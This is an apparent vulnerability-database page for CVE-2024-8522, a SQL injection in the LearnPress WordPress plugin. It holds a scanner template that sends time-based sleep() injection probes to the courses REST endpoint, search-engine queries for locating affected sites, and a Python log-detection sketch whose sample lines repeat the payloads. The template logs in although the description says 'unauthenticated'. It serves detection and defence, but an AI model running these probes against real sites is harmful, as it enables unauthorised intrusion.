LearnPress WordPress LMS SQL Injection vulnerability in REST AP
Reporter | Title | Published | Views | Family |
---|---|---|---|---|
Patchstack | WordPress LearnPress Plugin <= 4.2.7 is vulnerable to SQL Injection | 12 Sep 2024 00:00 | – | patchstack |
NVD | CVE-2024-8522 | 12 Sep 2024 09:15 | – | nvd |
Cvelist | CVE-2024-8522 LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields' | 12 Sep 2024 08:30 | – | cvelist |
Vulnrichment | CVE-2024-8522 LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields' | 12 Sep 2024 08:30 | – | vulnrichment |
CVE | CVE-2024-8522 | 12 Sep 2024 09:15 | – | cve |
0day.today | WordPress LMS 4.2.7 SQL Injection Vulnerability | 23 Sep 2024 00:00 | – | zdt |
Packet Storm | WordPress LMS 4.2.7 SQL Injection | 19 Sep 2024 00:00 | – | packetstorm |
Metasploit | WordPress LearnPress Unauthenticated SQLi (CVE-2024-8522, CVE-2024-8529) | 14 Oct 2024 16:15 | – | metasploit |
Rapid7 Blog | Metasploit Weekly Wrap-Up 10/18/2024 | 18 Oct 2024 18:14 | – | rapid7blog |
Wordfence Blog | Wordfence Intelligence Weekly WordPress Vulnerability Report (September 9, 2024 to September 15, 2024) | 19 Sep 2024 15:42 | – | wordfence |

```yaml
id: CVE-2024-8522

info:
  name: LearnPress – WordPress LMS - SQL Injection
  author: pdresearch,iamnoooob,rootxharsh
  severity: critical
  description: |
    The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access and data leakage.
  reference:
    - https://github.com/advisories/GHSA-3w3r-r6g6-w8x5
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8522
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-8522
    cwe-id: CWE-89
    epss-score: 0.04685
    epss-percentile: 0.91818
    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 4
    vendor: thimpress
    product: learnpress
    shodan-query: html:"/wp-content/plugins/learnpress"
    fofa-query: body="/wp-content/plugins/learnpress"
  tags: time-based-sqli,cve,cve2024,learnpress,sqli,wp,wordpress,wp-plugin,authenticated

flow: http(1) && http(2)

http:
  # Step 1: confirm the LearnPress plugin is referenced on the front page.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/learnpress")'
        internal: true

  # Step 2: log in, then send time-based probes in c_fields and c_only_fields.
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        @timeout: 30s
        GET /wp-json/learnpress/v1/courses?course_filter=&c_fields=post_title,(select(sleep(6))),ID& HTTP/1.1
        Host: {{Hostname}}
      - |
        @timeout: 30s
        GET /wp-json/learnpress/v1/courses?course_filter=&c_only_fields=post_title,(select(sleep(6))),ID& HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: dsl
        name: time-based
        dsl:
          - 'duration_1>=6'
          - 'duration_2>=6'
# digest: 4a0a00473045022100e13910450d93edce3729057fbab77394fbf598f2e7f34dac1e8055fd7caa4c2b02204bd42a4619f499cada5715d49dd76134ff2db4bec0df4de07bd210c21beda516:922c64590222798bb761d5b6d8e72950
```
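
A detection sketch for the parameter abuse described above, added here as an example and not part of the template or the plugin: it flags access-log requests to the courses route whose `c_only_fields` or `c_fields` value is anything other than a comma-separated identifier list. The log lines are constructed, and the identifier-only allow-list and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

ROUTE = "/learnpress/v1/courses"              # REST route named in the advisory
FIELD_PARAMS = ("c_only_fields", "c_fields")  # parameters probed by the template
# Assumption: a legitimate value is a comma-separated list of column identifiers.
SAFE_LIST = re.compile(r"[A-Za-z_][A-Za-z0-9_]*(?:,[A-Za-z_][A-Za-z0-9_]*)*")
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def suspicious_fields(log_line):
    """Return [(param, decoded_value)] for field lists that are not plain identifiers."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    query = parse_qs(target.query, keep_blank_values=True)  # also percent-decodes
    # WordPress serves the same route under /wp-json/... and ?rest_route=...
    via_path = target.path.rstrip("/").endswith("/wp-json" + ROUTE)
    via_query = query.get("rest_route", [""])[0].rstrip("/") == ROUTE
    if not (via_path or via_query):
        return []
    return [(p, v) for p in FIELD_PARAMS for v in query.get(p, [])
            if v and not SAFE_LIST.fullmatch(v)]

# Constructed sample log lines (client addresses from the documentation range).
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Sep/2024:10:00:01 +0000] "GET /wp-json/learnpress/v1/courses?course_filter=&c_only_fields=post_title,(select(sleep(6))),ID& HTTP/1.1" 200 512',
    '203.0.113.7 - - [19/Sep/2024:10:00:09 +0000] "GET /wp-json/learnpress/v1/courses?c_fields=post_title,%28select%28sleep%286%29%29%29,ID HTTP/1.1" 200 512',
    '198.51.100.4 - - [19/Sep/2024:10:01:00 +0000] "GET /wp-json/learnpress/v1/courses?c_only_fields=post_title,ID HTTP/1.1" 200 734',
    '198.51.100.4 - - [19/Sep/2024:10:01:05 +0000] "GET /wp-json/wp/v2/posts?c_only_fields=(x) HTTP/1.1" 200 90',
    '203.0.113.7 - - [19/Sep/2024:10:02:00 +0000] "GET /?rest_route=/learnpress/v1/courses&c_only_fields=post_title,(select(sleep(6))),ID HTTP/1.1" 200 512',
]

def scan(lines):
    """Return (line_number, param, value) for every suspicious parameter."""
    return [(n, p, v) for n, line in enumerate(lines, 1)
            for p, v in suspicious_fields(line)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```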